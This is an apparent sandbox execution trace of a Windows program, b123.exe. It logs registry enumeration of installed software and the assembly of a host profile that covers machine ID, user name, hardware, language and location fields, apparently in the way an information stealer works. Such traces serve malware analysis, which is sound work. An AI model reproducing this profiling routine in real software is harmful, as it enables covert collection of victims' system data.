9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 ", lpString2="10.0.40219" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219" [0235.140] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n" [0235.140] RegCloseKey (hKey=0x384) returned 0x0 [0235.140] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x24, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.140] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757") returned 100 [0235.140] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.140] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.140] RegCloseKey (hKey=0x384) returned 0x0 [0235.140] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x25, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.141] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173") returned 100 [0235.141] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.141] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.141] RegCloseKey (hKey=0x384) returned 0x0 [0235.141] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x26, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.141] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860") returned 100 [0235.141] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.141] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.141] RegCloseKey (hKey=0x384) returned 0x0 [0235.141] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x27, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.141] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655") returned 100 [0235.141] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.142] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.142] RegCloseKey (hKey=0x384) returned 0x0 [0235.142] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x28, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.142] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743") returned 100 [0235.142] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.142] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.142] RegCloseKey (hKey=0x384) returned 0x0 [0235.142] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x29, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.142] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063") returned 100 [0235.142] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.142] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.142] RegCloseKey (hKey=0x384) returned 0x0 [0235.142] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x2a, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.142] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573") returned 99 [0235.143] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.143] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x0, lpData=0x197bac*=0x31, lpcbData=0x197fac*=0x400) returned 0x2 [0235.143] RegCloseKey (hKey=0x384) returned 0x0 [0235.143] RegEnumKeyExA (in: hKey=0x388, dwIndex=0x2b, lpName=0x1983bc, lpcchName=0x197fac, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", lpcchName=0x197fac, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0235.143] wsprintfA (in: param_1=0x197fbc, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}") returned 90 [0235.143] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fb8 | out: phkResult=0x197fb8*=0x384) returned 0x0 [0235.143] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005", lpcbData=0x197fac*=0x3e) returned 0x0 [0235.143] lstrlenA (lpString="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned 61 [0235.143] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\n", lpString2="Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nOffice 16 Click-to-Run Extensibility Component 16.0.4266.1003\nOffice 16 Click-to-Run Localization Component 16.0.4266.1003\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2010 x86 Redistributable - 10.0.40219 10.0.40219\nMicrosoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005" [0235.143] RegQueryValueExA (in: hKey=0x384, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987c0, lpData=0x197bac, lpcbData=0x197fac*=0x400 | out: lpType=0x1987c0*=0x1, lpData="12.0.21005", lpcbData=0x197fac*=0xb) returned 0x0 [0235.143] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\b123.exe\n\nLocal Time: 23/3/2022 4:48:41\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft 